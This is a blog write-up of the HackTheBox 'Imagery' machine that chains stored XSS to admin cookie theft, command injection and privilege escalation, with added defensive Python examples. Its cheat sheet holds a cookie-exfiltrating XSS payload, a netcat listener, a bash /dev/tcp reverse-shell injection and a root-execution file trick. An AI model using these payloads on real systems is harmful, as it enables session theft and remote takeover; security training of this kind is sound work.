Motasem Hamdan
From Stored XSS to RCE | HackTheBox Imagery Writeup

I see it all the time in pentest reports: Stored XSS gets rated as Medium or even Low because it requires user interaction. But my recent run through HackTheBox’s Imagery machine reminded me why that mindset is dangerous.

The box is a perfect example of a Daisy Chain attack where a seemingly minor client-side bug becomes the skeleton key for the entire backend.

Note:

This post is not a step-by-step walkthrough, exploit guide, or solution. It is intentionally written as a learning-first methodology breakdown.

The value of this approach is simple: walkthroughs teach what to type; methodologies teach how to think. By focusing on enumeration strategy, decision-making patterns, and architectural reasoning, this post is designed to help you transfer the same mindset to real assessments, labs, certifications, and production environments, not just this specific challenge.

Use this content to:

  • Sharpen your mental model, not your copy-paste skills
  • Understand why certain paths exist rather than memorizing how to reach them
  • Build repeatable intuition that applies beyond CTFs

If your goal is long-term growth as a security practitioner, this style will compound. If your goal is only to solve the box, this post is deliberately not optimized for that.

Here is the TL;DR of the kill chain:

The Enumeration Methodology

The standard approach of blindly firing directory busters will yield limited returns here. The elite methodology requires a Feature-First audit.

Upon discovering the web service on port 8000 (running Werkzeug/Python), your primary goal isn’t just to map endpoints, but to map data flows. You must identify every input: login forms, upload buttons, and, critically, the “Bug Report” feature.

The presence of a bug report system should trigger immediate investigation into Stored Cross-Site Scripting (XSS) vectors.

You are asking: If I submit this, who reads it? If the answer is “an admin,” you have a potential path to privilege hijacking.

Simultaneously, the Image Transformation features (crop, rotate, etc.) must be flagged as high-probability targets for Command Injection, as these often rely on underlying system shell commands rather than safe API calls.


Stored XSS

It started with a standard “Bug Report” feature. Most would check for SQLi and move on. I found I could inject a payload that stored XSS.

Cookie Theft

It wasn’t about popping an alert box. I used the XSS to blindly exfiltrate the Administrator’s session cookie when they (the bot/admin) reviewed the report.
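As an added defensive illustration, not code from the box or from the author: a stdlib-only Python sketch of the two controls that break this link of the chain, escaping the report body before the admin's page renders it, and flagging the session cookie HttpOnly so page scripts cannot read it. The report text, token and hostnames are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample report body: the shape of a stored-XSS submission aimed
# at whoever reviews bug reports. It only reads document.cookie locally here.
SAMPLE_REPORT = (
    "Crop fails on large PNGs. "
    "<script>console.log(document.cookie)</script>"
)


def render_report_unsafe(body: str) -> str:
    """The risky pattern: report text dropped straight into the admin's HTML."""
    return f"<div class='report'>{body}</div>"


def render_report_safe(body: str) -> str:
    """Escape on output so the browser shows the tag as text instead of running it."""
    return f"<div class='report'>{html.escape(body, quote=True)}</div>"


def session_cookie_header(token: str) -> str:
    """Set-Cookie value for the admin session. HttpOnly keeps the value out of
    document.cookie, so even an unescaped payload cannot read it; Secure and
    SameSite=Lax narrow where the browser will send it."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


def has_active_script(rendered: str) -> bool:
    """Crude marker check, used only to contrast the two renderers."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_report_safe(SAMPLE_REPORT))
    print("Set-Cookie:", session_cookie_header("constructed-token"))
```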

The RCE

With admin access, I reached the image management panel. Code review (leaked via a directory traversal bug) revealed a Command Injection flaw in the crop feature—but it was only accessible to authenticated admins. Without that "low prio" XSS, the RCE was unreachable.

The PrivEsc

Leaked the database credentials to crack the test user's hash.

Found an encrypted backup (pyAesCrypt), brute-forced it to find another user's hash.

Finally rooted the box by abusing a custom backup utility running with sudo privileges.

Commands Cheat Sheet

While the logic is paramount, having the right syntax is critical for execution.

XSS Payload (Session Stealing): Inject this into the bug report description to exfiltrate the admin’s cookie to your listener.

:4444/?cookie='+document.cookie>

Cookie Listener:

nc -lvnp 4444

Command Injection (ImageMagick Context): If the application naively concatenates arguments, you can break out of the convert command.

; /bin/bash -c 'bash -i >& /dev/tcp//4445 0>&1';
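Added example, not the Imagery application's code: the string-concatenation pattern that makes a crop feature injectable, shown beside an argv-based build that allowlists the geometry and filename before anything reaches convert. IMAGE_DIR and the sample inputs are assumed values for the example; the benign `; id` suffix only shows where a shell would split the line.

```python
import re
import shlex
import subprocess
from pathlib import Path

IMAGE_DIR = Path("/srv/imagery/uploads")  # assumed upload location
# ImageMagick crop geometry: WIDTHxHEIGHT+XOFF+YOFF, digits only.
GEOMETRY_RE = re.compile(r"^\d{1,5}x\d{1,5}\+\d{1,5}\+\d{1,5}$")
# Plain basenames only: no separators, and no ImageMagick coder prefixes
# ("label:", "|cmd") that argv passing alone would not stop.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


def build_crop_command_unsafe(filename: str, geometry: str) -> str:
    """The risky pattern: user input joined into one string meant for shell=True.
    Returned, not executed, so the tokenization can be inspected."""
    return (f"convert {IMAGE_DIR}/{filename} -crop {geometry} "
            f"{IMAGE_DIR}/cropped_{filename}")


def shell_tokens(command: str) -> list:
    """Split a command line the way a POSIX shell would, keeping ';' as a token."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def build_crop_argv(filename: str, geometry: str) -> list:
    """Hardened form: validate both inputs, then pass an argv list (no shell).
    Anything that fails the allowlist is rejected outright."""
    if not SAFE_NAME_RE.fullmatch(filename):
        raise ValueError("rejected filename")
    if not GEOMETRY_RE.fullmatch(geometry):
        raise ValueError("rejected geometry")
    src = IMAGE_DIR / filename
    dst = IMAGE_DIR / f"cropped_{filename}"
    return ["convert", str(src), "-crop", geometry, str(dst)]


def run_crop(filename: str, geometry: str) -> subprocess.CompletedProcess:
    """Execute the validated argv; metacharacters stay literal text to convert."""
    return subprocess.run(build_crop_argv(filename, geometry),
                          check=True, capture_output=True)


if __name__ == "__main__":
    print(shell_tokens(build_crop_command_unsafe("a.png", "100x100+0+0; id")))
    print(build_crop_argv("a.png", "100x100+0+0"))
```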

Stabilizing the Shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
(Ctrl+Z)
stty raw -echo; fg

Privilege Escalation (Cron/File Monitoring): If a root script processes files in a directory you control, creating a malicious file name or content can trigger execution.

echo 'import os; os.system("/bin/bash")' > /tmp/malicious.py

The Takeaway

If you are ignoring XSS to hunt for “cooler” binary exploits, you are missing the forest for the trees. In modern web apps, XSS is often the only way to bridge the gap between “Public User” and “Internal Admin” where the RCEs actually live.

If you want to see the exact payloads, the Python scripts I used for the crypto-cracking, and the full step-by-step breakdown, check out my writeup here.
